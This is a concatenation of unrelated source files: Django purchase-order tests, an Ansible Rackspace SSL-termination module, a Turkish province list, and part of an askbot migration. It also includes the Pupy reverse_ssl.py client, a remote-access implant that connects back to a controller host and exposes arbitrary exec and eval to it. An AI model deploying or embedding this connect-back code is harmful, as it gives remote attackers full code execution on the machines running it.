class OrderTest(TestCase):
    """
    Tests to ensure that the order models are functioning correctly.
    """
    # Fixture data: companies, supplier parts, pricing, stock locations and
    # the purchase orders exercised by the tests below.
    fixtures = [
        'company',
        'supplier_part',
        'price_breaks',
        'category',
        'part',
        'location',
        'stock',
        'order'
    ]
    def test_basics(self):
        """ Basic tests e.g. repr functions etc """
        order = PurchaseOrder.objects.get(pk=1)
        self.assertEqual(order.get_absolute_url(), '/order/purchase-order/1/')
        self.assertEqual(str(order), 'PO0001 - ACME')
        line = PurchaseOrderLineItem.objects.get(pk=1)
        self.assertEqual(str(line), "100 x ACME0001 from ACME (for PO0001 - ACME)")
    def test_overdue(self):
        """
        Test overdue status functionality
        """
        today = datetime.now().date()
        order = PurchaseOrder.objects.get(pk=1)
        self.assertFalse(order.is_overdue)
        # A target date in the past makes the order overdue
        order.target_date = today - timedelta(days=5)
        order.save()
        self.assertTrue(order.is_overdue)
        # A target date in the future does not
        order.target_date = today + timedelta(days=1)
        order.save()
        self.assertFalse(order.is_overdue)
    def test_on_order(self):
        """ There should be 4 separate line items on order for the M2x4 LPHS part """
        part = Part.objects.get(name='M2x4 LPHS')
        open_orders = []
        for supplier in part.supplier_parts.all():
            open_orders += supplier.open_orders()
        self.assertEqual(len(open_orders), 4)
        # Test the total on-order quantity
        self.assertEqual(part.on_order, 1400)
    def test_add_items(self):
        """ Test functions for adding line items to an order """
        order = PurchaseOrder.objects.get(pk=1)
        self.assertEqual(order.status, PurchaseOrderStatus.PENDING)
        self.assertEqual(order.lines.count(), 4)
        sku = SupplierPart.objects.get(SKU='ACME-WIDGET')
        part = sku.part
        # Try to order some invalid things
        with self.assertRaises(django_exceptions.ValidationError):
            order.add_line_item(sku, -999)
        with self.assertRaises(django_exceptions.ValidationError):
            order.add_line_item(sku, 'not a number')
        # Order the part
        self.assertEqual(part.on_order, 0)
        order.add_line_item(sku, 100)
        self.assertEqual(part.on_order, 100)
        self.assertEqual(order.lines.count(), 5)
        # Order the same part again (it should be merged)
        order.add_line_item(sku, 50)
        self.assertEqual(order.lines.count(), 5)
        self.assertEqual(part.on_order, 150)
        # Try to order a supplier part from the wrong supplier
        sku = SupplierPart.objects.get(SKU='ZERG-WIDGET')
        with self.assertRaises(django_exceptions.ValidationError):
            order.add_line_item(sku, 99)
    def test_pricing(self):
        """ Test functions for adding line items to an order including price-breaks """
        order = PurchaseOrder.objects.get(pk=7)
        self.assertEqual(order.status, PurchaseOrderStatus.PENDING)
        self.assertEqual(order.lines.count(), 0)
        sku = SupplierPart.objects.get(SKU='ZERGM312')
        part = sku.part
        # Order the part
        self.assertEqual(part.on_order, 0)
        # Order 25 with manually set high value
        pp = sku.get_price(25)
        order.add_line_item(sku, 25, purchase_price=pp)
        self.assertEqual(part.on_order, 25)
        self.assertEqual(order.lines.count(), 1)
        self.assertEqual(order.lines.first().purchase_price.amount, 200)
        # Add a few, now the pricebreak should adjust although wrong price given
        order.add_line_item(sku, 10, purchase_price=sku.get_price(25))
        self.assertEqual(part.on_order, 35)
        self.assertEqual(order.lines.count(), 1)
        self.assertEqual(order.lines.first().purchase_price.amount, 8)
        # Order the same part again (it should be merged)
        order.add_line_item(sku, 100, purchase_price=sku.get_price(100))
        self.assertEqual(order.lines.count(), 1)
        self.assertEqual(part.on_order, 135)
        self.assertEqual(order.lines.first().purchase_price.amount, 1.25)
    def test_receive(self):
        """ Test order receiving functions """
        part = Part.objects.get(name='M2x4 LPHS')
        # Receive some items
        line = PurchaseOrderLineItem.objects.get(id=1)
        order = line.order
        loc = StockLocation.objects.get(id=1)
        # There should be four pending line items against this order
        self.assertEqual(len(order.pending_line_items()), 4)
        # Should fail, as order is 'PENDING' not 'PLACED'
        self.assertEqual(order.status, PurchaseOrderStatus.PENDING)
        with self.assertRaises(django_exceptions.ValidationError):
            order.receive_line_item(line, loc, 50, user=None)
        order.place_order()
        self.assertEqual(order.status, PurchaseOrderStatus.PLACED)
        order.receive_line_item(line, loc, 50, user=None)
        self.assertEqual(line.remaining(), 50)
        self.assertEqual(part.on_order, 1350)
        # Try to order some invalid things
        with self.assertRaises(django_exceptions.ValidationError):
            order.receive_line_item(line, loc, -10, user=None)
        with self.assertRaises(django_exceptions.ValidationError):
            order.receive_line_item(line, loc, 'not a number', user=None)
        # Receive the rest of the items
        order.receive_line_item(line, loc, 50, user=None)
        line = PurchaseOrderLineItem.objects.get(id=2)
        order.receive_line_item(line, loc, 500, user=None)
        self.assertEqual(part.on_order, 800)
        self.assertEqual(order.status, PurchaseOrderStatus.PLACED)
        # Receiving every remaining line item completes the order
        for line in order.pending_line_items():
            order.receive_line_item(line, loc, line.quantity, user=None)
        self.assertEqual(order.status, PurchaseOrderStatus.COMPLETE)
| mit |
dgarros/ansible | lib/ansible/modules/cloud/rackspace/rax_clb_ssl.py | 70 | 9636 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# This is a DOCUMENTATION stub specific to this module, it extends
# a documentation fragment located in ansible.utils.module_docs_fragments
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION='''
module: rax_clb_ssl
short_description: Manage SSL termination for a Rackspace Cloud Load Balancer.
description:
- Set up, reconfigure, or remove SSL termination for an existing load balancer.
version_added: "2.0"
options:
loadbalancer:
description:
- Name or ID of the load balancer on which to manage SSL termination.
required: true
state:
description:
- If set to "present", SSL termination will be added to this load balancer.
- If "absent", SSL termination will be removed instead.
choices:
- present
- absent
default: present
enabled:
description:
- If set to "false", temporarily disable SSL termination without discarding
- existing credentials.
default: true
private_key:
description:
- The private SSL key as a string in PEM format.
certificate:
description:
- The public SSL certificates as a string in PEM format.
intermediate_certificate:
description:
- One or more intermediate certificate authorities as a string in PEM
- format, concatenated into a single string.
secure_port:
description:
- The port to listen for secure traffic.
default: 443
secure_traffic_only:
description:
- If "true", the load balancer will *only* accept secure traffic.
default: false
https_redirect:
description:
- If "true", the load balancer will redirect HTTP traffic to HTTPS.
- Requires "secure_traffic_only" to be true. Incurs an implicit wait if SSL
- termination is also applied or removed.
wait:
description:
- Wait for the balancer to be in state "running" before turning.
default: false
wait_timeout:
description:
- How long before "wait" gives up, in seconds.
default: 300
author: Ash Wilson
extends_documentation_fragment: rackspace
'''
EXAMPLES = '''
- name: Enable SSL termination on a load balancer
rax_clb_ssl:
loadbalancer: the_loadbalancer
state: present
private_key: "{{ lookup('file', 'credentials/server.key' ) }}"
certificate: "{{ lookup('file', 'credentials/server.crt' ) }}"
intermediate_certificate: "{{ lookup('file', 'credentials/trust-chain.crt') }}"
secure_traffic_only: true
wait: true
- name: Disable SSL termination
rax_clb_ssl:
loadbalancer: "{{ registered_lb.balancer.id }}"
state: absent
wait: true
'''
try:
    import pyrax
    HAS_PYRAX = True
except ImportError:
    # pyrax is optional at import time; main() reports a clear error later.
    HAS_PYRAX = False
def cloud_load_balancer_ssl(module, loadbalancer, state, enabled, private_key,
                            certificate, intermediate_certificate, secure_port,
                            secure_traffic_only, https_redirect,
                            wait, wait_timeout):
    """Apply, reconfigure or remove SSL termination on a cloud load balancer.

    Never returns normally: always exits the Ansible run via
    module.exit_json (result dict with changed/https_redirect/
    ssl_termination/balancer keys) or module.fail_json.
    """
    # Validate arguments.
    if state == 'present':
        if not private_key:
            module.fail_json(msg="private_key must be provided.")
        else:
            private_key = private_key.strip()
        if not certificate:
            module.fail_json(msg="certificate must be provided.")
        else:
            certificate = certificate.strip()
    # wait_for_build polls every 5 seconds, so timeout/5 polling attempts.
    attempts = wait_timeout / 5
    # Locate the load balancer.
    balancer = rax_find_loadbalancer(module, pyrax, loadbalancer)
    existing_ssl = balancer.get_ssl_termination()
    changed = False
    if state == 'present':
        # Apply or reconfigure SSL termination on the load balancer.
        ssl_attrs = dict(
            securePort=secure_port,
            privatekey=private_key,
            certificate=certificate,
            intermediateCertificate=intermediate_certificate,
            enabled=enabled,
            secureTrafficOnly=secure_traffic_only
        )
        needs_change = False
        if existing_ssl:
            # Only push an update if some visible attribute actually differs.
            for ssl_attr, value in ssl_attrs.items():
                if ssl_attr == 'privatekey':
                    # The private key is not included in get_ssl_termination's
                    # output (as it shouldn't be). Also, if you're changing the
                    # private key, you'll also be changing the certificate,
                    # so we don't lose anything by not checking it.
                    continue
                if value is not None and existing_ssl.get(ssl_attr) != value:
                    # module.fail_json(msg='Unnecessary change', attr=ssl_attr, value=value, existing=existing_ssl.get(ssl_attr))
                    needs_change = True
        else:
            needs_change = True
        if needs_change:
            try:
                balancer.add_ssl_termination(**ssl_attrs)
            except pyrax.exceptions.PyraxException as e:
                module.fail_json(msg='%s' % e.message)
            changed = True
    elif state == 'absent':
        # Remove SSL termination if it's already configured.
        if existing_ssl:
            try:
                balancer.delete_ssl_termination()
            except pyrax.exceptions.PyraxException as e:
                module.fail_json(msg='%s' % e.message)
            changed = True
    if https_redirect is not None and balancer.httpsRedirect != https_redirect:
        if changed:
            # This wait is unavoidable because load balancers are immutable
            # while the SSL termination changes above are being applied.
            pyrax.utils.wait_for_build(balancer, interval=5, attempts=attempts)
        try:
            balancer.update(httpsRedirect=https_redirect)
        except pyrax.exceptions.PyraxException as e:
            module.fail_json(msg='%s' % e.message)
        changed = True
    if changed and wait:
        pyrax.utils.wait_for_build(balancer, interval=5, attempts=attempts)
    # Refresh the balancer so the reported state reflects the changes above.
    balancer.get()
    new_ssl_termination = balancer.get_ssl_termination()
    # Intentionally omit the private key from the module output, so you don't
    # accidentally echo it with `ansible-playbook -v` or `debug`, and the
    # certificate, which is just long. Convert other attributes to snake_case
    # and include https_redirect at the top-level.
    if new_ssl_termination:
        new_ssl = dict(
            enabled=new_ssl_termination['enabled'],
            secure_port=new_ssl_termination['securePort'],
            secure_traffic_only=new_ssl_termination['secureTrafficOnly']
        )
    else:
        new_ssl = None
    result = dict(
        changed=changed,
        https_redirect=balancer.httpsRedirect,
        ssl_termination=new_ssl,
        balancer=rax_to_dict(balancer, 'clb')
    )
    success = True
    if balancer.status == 'ERROR':
        result['msg'] = '%s failed to build' % balancer.id
        success = False
    elif wait and balancer.status not in ('ACTIVE', 'ERROR'):
        result['msg'] = 'Timeout waiting on %s' % balancer.id
        success = False
    if success:
        module.exit_json(**result)
    else:
        module.fail_json(**result)
def main():
    """Ansible entry point: build the argument spec, validate inputs and
    dispatch to cloud_load_balancer_ssl (which exits the module)."""
    argument_spec = rax_argument_spec()
    argument_spec.update(dict(
        loadbalancer=dict(required=True),
        state=dict(default='present', choices=['present', 'absent']),
        enabled=dict(type='bool', default=True),
        private_key=dict(),
        certificate=dict(),
        intermediate_certificate=dict(),
        secure_port=dict(type='int', default=443),
        secure_traffic_only=dict(type='bool', default=False),
        https_redirect=dict(type='bool'),
        wait=dict(type='bool', default=False),
        wait_timeout=dict(type='int', default=300)
    ))
    module = AnsibleModule(
        argument_spec=argument_spec,
        required_together=rax_required_together(),
    )
    # Fail early if the optional pyrax dependency was not importable.
    if not HAS_PYRAX:
        module.fail_json(msg='pyrax is required for this module.')
    loadbalancer = module.params.get('loadbalancer')
    state = module.params.get('state')
    enabled = module.boolean(module.params.get('enabled'))
    private_key = module.params.get('private_key')
    certificate = module.params.get('certificate')
    intermediate_certificate = module.params.get('intermediate_certificate')
    secure_port = module.params.get('secure_port')
    secure_traffic_only = module.boolean(module.params.get('secure_traffic_only'))
    https_redirect = module.boolean(module.params.get('https_redirect'))
    wait = module.boolean(module.params.get('wait'))
    wait_timeout = module.params.get('wait_timeout')
    setup_rax_module(module, pyrax)
    cloud_load_balancer_ssl(
        module, loadbalancer, state, enabled, private_key, certificate,
        intermediate_certificate, secure_port, secure_traffic_only,
        https_redirect, wait, wait_timeout
    )
from ansible.module_utils.basic import *
from ansible.module_utils.rax import *
# Standard module entry point: run main() only when executed directly.
if __name__ == '__main__':
    main()
| gpl-3.0 |
potatolondon/django-nonrel-1-4 | django/contrib/localflavor/tr/tr_provinces.py | 316 | 2191 | # -*- coding: utf-8 -*-
"""
This exists in this standalone file so that it's only imported into memory
when explicitly needed.
"""
# Two-tuples of (code, province name), suitable for a Django choices list.
# The redundant parentheses around each name string (a no-op in Python)
# have been dropped; codes and names are unchanged.
PROVINCE_CHOICES = (
    ('01', 'Adana'),
    ('02', 'Adıyaman'),
    ('03', 'Afyonkarahisar'),
    ('04', 'Ağrı'),
    ('68', 'Aksaray'),
    ('05', 'Amasya'),
    ('06', 'Ankara'),
    ('07', 'Antalya'),
    ('75', 'Ardahan'),
    ('08', 'Artvin'),
    ('09', 'Aydın'),
    ('10', 'Balıkesir'),
    ('74', 'Bartın'),
    ('72', 'Batman'),
    ('69', 'Bayburt'),
    ('11', 'Bilecik'),
    ('12', 'Bingöl'),
    ('13', 'Bitlis'),
    ('14', 'Bolu'),
    ('15', 'Burdur'),
    ('16', 'Bursa'),
    ('17', 'Çanakkale'),
    ('18', 'Çankırı'),
    ('19', 'Çorum'),
    ('20', 'Denizli'),
    ('21', 'Diyarbakır'),
    ('81', 'Düzce'),
    ('22', 'Edirne'),
    ('23', 'Elazığ'),
    ('24', 'Erzincan'),
    ('25', 'Erzurum'),
    ('26', 'Eskişehir'),
    ('27', 'Gaziantep'),
    ('28', 'Giresun'),
    ('29', 'Gümüşhane'),
    ('30', 'Hakkari'),
    ('31', 'Hatay'),
    ('76', 'Iğdır'),
    ('32', 'Isparta'),
    ('33', 'Mersin'),
    ('34', 'İstanbul'),
    ('35', 'İzmir'),
    ('78', 'Karabük'),
    ('36', 'Kars'),
    ('37', 'Kastamonu'),
    ('38', 'Kayseri'),
    ('39', 'Kırklareli'),
    ('40', 'Kırşehir'),
    ('41', 'Kocaeli'),
    ('42', 'Konya'),
    ('43', 'Kütahya'),
    ('44', 'Malatya'),
    ('45', 'Manisa'),
    ('46', 'Kahramanmaraş'),
    ('70', 'Karaman'),
    ('71', 'Kırıkkale'),
    ('79', 'Kilis'),
    ('47', 'Mardin'),
    ('48', 'Muğla'),
    ('49', 'Muş'),
    ('50', 'Nevşehir'),
    ('51', 'Niğde'),
    ('52', 'Ordu'),
    ('80', 'Osmaniye'),
    ('53', 'Rize'),
    ('54', 'Sakarya'),
    ('55', 'Samsun'),
    ('56', 'Siirt'),
    ('57', 'Sinop'),
    ('58', 'Sivas'),
    ('73', 'Şırnak'),
    ('59', 'Tekirdağ'),
    ('60', 'Tokat'),
    ('61', 'Trabzon'),
    ('62', 'Tunceli'),
    ('63', 'Şanlıurfa'),
    ('64', 'Uşak'),
    ('65', 'Van'),
    ('77', 'Yalova'),
    ('66', 'Yozgat'),
    ('67', 'Zonguldak'),
)
| bsd-3-clause |
shaheemirza/pupy | client/reverse_ssl.py | 11 | 2928 | #!/usr/bin/env python
# -*- coding: UTF8 -*-
import site
import sys
import time
import rpyc
from rpyc.core.service import Service, ModuleNamespace
from rpyc.lib.compat import execute, is_py3k
import threading
import weakref
import traceback
import os
import subprocess
import threading
import multiprocessing
import logging
import StringIO
import json
import urllib2
import urllib
import platform
import re
import ssl
import random
import imp
class ReverseSlaveService(Service):
    """Pupy reverse shell rpyc service.

    Exposes exec/eval/import primitives to the remote controller over an
    rpyc connection; all exposed_* methods are callable from the other side.
    """
    __slots__ = ["exposed_namespace"]
    def on_connect(self):
        # Fresh, per-connection namespace shared by exposed_execute/eval.
        self.exposed_namespace = {}
        # Fully open up the rpyc protocol for this connection.
        self._conn._config.update({
            "allow_all_attrs": True,
            "allow_public_attrs": True,
            "allow_pickle": True,
            "allow_getattr": True,
            "allow_setattr": True,
            "allow_delattr": True,
            "import_custom_exceptions": False,
            "propagate_SystemExit_locally": False,
            "propagate_KeyboardInterrupt_locally": True,
            "instantiate_custom_exceptions": True,
            "instantiate_oldstyle_exceptions": True,
        })
        # Shortcut: hand the server a module namespace backed by our importer.
        self._conn.root.set_modules(ModuleNamespace(self.exposed_getmodule))
    def exposed_exit(self):
        """Tear down the client loop by raising KeyboardInterrupt locally."""
        raise KeyboardInterrupt
    def exposed_execute(self, text):
        """Execute arbitrary code (using ``exec``) in the shared namespace."""
        execute(text, self.exposed_namespace)
    def exposed_eval(self, text):
        """Evaluate arbitrary code (using ``eval``) in the shared namespace."""
        return eval(text, self.exposed_namespace)
    def exposed_getmodule(self, name):
        """Import and return an arbitrary module by name."""
        return __import__(name, None, None, "*")
    def exposed_getconn(self):
        """Return the local connection instance to the other side."""
        return self._conn
def get_next_wait(attempt):
    """Return the delay in seconds before the next reconnection attempt.

    The first 60 attempts retry quickly (0.5s); after that the delay is
    randomized between 15 and 30 seconds to back off instead of spinning
    in a tight reconnect loop.
    """
    # NOTE(review): the original had an unconditional `return 0.5` here,
    # which made the backoff branch below unreachable dead code.
    if attempt < 60:
        return 0.5
    else:
        return random.randint(15, 30)
def add_pseudo_pupy_module(HOST):
    """Install a stand-in ``pupy`` module exposing the connect-back host.

    No-op when a ``pupy`` module (real builtin or a previous stand-in) is
    already present in sys.modules.
    """
    if "pupy" in sys.modules:
        return
    pseudo_mod = imp.new_module("pupy")
    pseudo_mod.__name__ = "pupy"
    pseudo_mod.__file__ = "<memimport>\\\\pupy"
    pseudo_mod.__package__ = "pupy"
    sys.modules["pupy"] = pseudo_mod
    pseudo_mod.get_connect_back_host = lambda: HOST
    # Marks this module as the stand-in rather than the real builtin.
    pseudo_mod.pseudo = True
def main():
    # Connect back to the pupy server and serve the reverse rpyc session,
    # reconnecting forever until a KeyboardInterrupt (see exposed_exit).
    # Default connect-back target, overridden below per platform.
    HOST="127.0.0.1:443"
    if "windows" in platform.system().lower():
        try:
            # When started from the pupy exe stub / reflective DLL, a builtin
            # "pupy" module provides the real connect-back host.
            import pupy
            HOST=pupy.get_connect_back_host()
        except ImportError:
            print "Warning : ImportError: pupy builtin module not found ! please start pupy from either it's exe stub or it's reflective DLL"
        # NOTE(review): at this indentation the argv requirement runs even when
        # the pupy builtin supplied a host (overriding it); upstream intent may
        # have been to nest this under the ImportError branch -- confirm.
        if len(sys.argv)!=2:
            exit("usage: %s host:port"%sys.argv[0])
        HOST=sys.argv[1]
    else:
        # Non-Windows: expose the default HOST through a stand-in pupy module.
        add_pseudo_pupy_module(HOST)
    attempt=0
    while True:
        try:
            rhost,rport=None,None
            # Split "host:port" from the right; port defaults to 443.
            tab=HOST.rsplit(":",1)
            rhost=tab[0]
            if len(tab)==2:
                rport=int(tab[1])
            else:
                rport=443
            print "connecting to %s:%s"%(rhost,rport)
            conn=rpyc.ssl_connect(rhost, rport, service = ReverseSlaveService)
            while True:
                # Reset the backoff counter once a connection is serving.
                attempt=0
                conn.serve()
        except KeyboardInterrupt:
            print "keyboard interrupt received !"
            break
        except Exception as e:
            # Any other failure: back off (see get_next_wait) and retry.
            time.sleep(get_next_wait(attempt))
            attempt+=1
if __name__=="__main__":
main()
| bsd-3-clause |
alexproca/askbot-devel | askbot/migrations/0038_add_tag_filter_strategies.py | 13 | 26661 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
from askbot import const
from askbot.migrations_api import safe_add_column
class Migration(SchemaMigration):
    """Askbot schema migration 0038: add per-user tag filter strategy columns."""
    def forwards(self, orm):
        """Add email/display tag filter strategy columns to auth_user."""
        # Add the two tag-filter-strategy columns (the original comment here
        # wrongly said "country fields"). safe_add_column tolerates the
        # column already existing.
        safe_add_column(
            u'auth_user',
            'email_tag_filter_strategy',
            self.gf(
                'django.db.models.fields.SmallIntegerField'
            )(default = const.EXCLUDE_IGNORED)
        )
        safe_add_column(
            u'auth_user',
            'display_tag_filter_strategy',
            self.gf(
                'django.db.models.fields.SmallIntegerField'
            )(default = const.INCLUDE_ALL)
        )
    def backwards(self, orm):
        """Drop the two columns added by forwards()."""
        db.delete_column(u'auth_user', 'email_tag_filter_strategy')
        db.delete_column(u'auth_user', 'display_tag_filter_strategy')
    # Frozen ORM state captured by South when this migration was generated;
    # auto-generated -- do not edit by hand.
    models = {
        'askbot.activity': {
            'Meta': {'object_name': 'Activity', 'db_table': "u'activity'"},
            'active_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'activity_type': ('django.db.models.fields.SmallIntegerField', [], {}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_auditted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
            'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['askbot.Question']", 'null': 'True'}),
            'receiving_users': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'received_activity'", 'to': "orm['auth.User']"}),
            'recipients': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'incoming_activity'", 'through': "'ActivityAuditStatus'", 'to': "orm['auth.User']"}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
        },
        'askbot.activityauditstatus': {
            'Meta': {'unique_together': "(('user', 'activity'),)", 'object_name': 'ActivityAuditStatus'},
            'activity': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['askbot.Activity']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'status': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
        },
        'askbot.anonymousanswer': {
            'Meta': {'object_name': 'AnonymousAnswer'},
            'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'ip_addr': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
            'question': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'anonymous_answers'", 'to': "orm['askbot.Question']"}),
            'session_key': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
            'summary': ('django.db.models.fields.CharField', [], {'max_length': '180'}),
            'text': ('django.db.models.fields.TextField', [], {}),
            'wiki': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'})
        },
        'askbot.anonymousquestion': {
            'Meta': {'object_name': 'AnonymousQuestion'},
            'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'ip_addr': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
            'session_key': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
            'summary': ('django.db.models.fields.CharField', [], {'max_length': '180'}),
            'tagnames': ('django.db.models.fields.CharField', [], {'max_length': '125'}),
            'text': ('django.db.models.fields.TextField', [], {}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '300'}),
            'wiki': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'})
        },
        'askbot.answer': {
            'Meta': {'object_name': 'Answer', 'db_table': "u'answer'"},
            'accepted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'accepted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'author': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'answers'", 'to': "orm['auth.User']"}),
            'comment_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
            'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'deleted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'deleted_answers'", 'null': 'True', 'to': "orm['auth.User']"}),
            'html': ('django.db.models.fields.TextField', [], {'null': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'last_edited_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'last_edited_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'last_edited_answers'", 'null': 'True', 'to': "orm['auth.User']"}),
            'locked': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'locked_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'locked_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'locked_answers'", 'null': 'True', 'to': "orm['auth.User']"}),
            'offensive_flag_count': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
            'question': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'answers'", 'to': "orm['askbot.Question']"}),
            'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'text': ('django.db.models.fields.TextField', [], {'null': 'True'}),
            'vote_down_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'vote_up_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'wiki': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'wikified_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
        },
        'askbot.answerrevision': {
            'Meta': {'object_name': 'AnswerRevision', 'db_table': "u'answer_revision'"},
            'answer': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'revisions'", 'to': "orm['askbot.Answer']"}),
            'author': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'answerrevisions'", 'to': "orm['auth.User']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'revised_at': ('django.db.models.fields.DateTimeField', [], {}),
            'revision': ('django.db.models.fields.PositiveIntegerField', [], {}),
            'summary': ('django.db.models.fields.CharField', [], {'max_length': '300', 'blank': 'True'}),
            'text': ('django.db.models.fields.TextField', [], {})
        },
        'askbot.award': {
            'Meta': {'object_name': 'Award', 'db_table': "u'award'"},
            'awarded_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'badge': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'award_badge'", 'to': "orm['askbot.BadgeData']"}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'notified': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'award_user'", 'to': "orm['auth.User']"})
        },
        'askbot.badgedata': {
            'Meta': {'object_name': 'BadgeData'},
            'awarded_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
            'awarded_to': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'badges'", 'through': "'Award'", 'to': "orm['auth.User']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'})
        },
        'askbot.comment': {
            'Meta': {'object_name': 'Comment', 'db_table': "u'comment'"},
            'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'comment': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'html': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '2048'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
            'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'comments'", 'to': "orm['auth.User']"})
        },
        'askbot.emailfeedsetting': {
            'Meta': {'object_name': 'EmailFeedSetting'},
            'added_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'feed_type': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
            'frequency': ('django.db.models.fields.CharField', [], {'default': "'n'", 'max_length': '8'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'reported_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
            'subscriber': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'notification_subscriptions'", 'to': "orm['auth.User']"})
        },
        'askbot.favoritequestion': {
            'Meta': {'object_name': 'FavoriteQuestion', 'db_table': "u'favorite_question'"},
            'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['askbot.Question']"}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'user_favorite_questions'", 'to': "orm['auth.User']"})
        },
        'askbot.markedtag': {
            'Meta': {'object_name': 'MarkedTag'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'reason': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
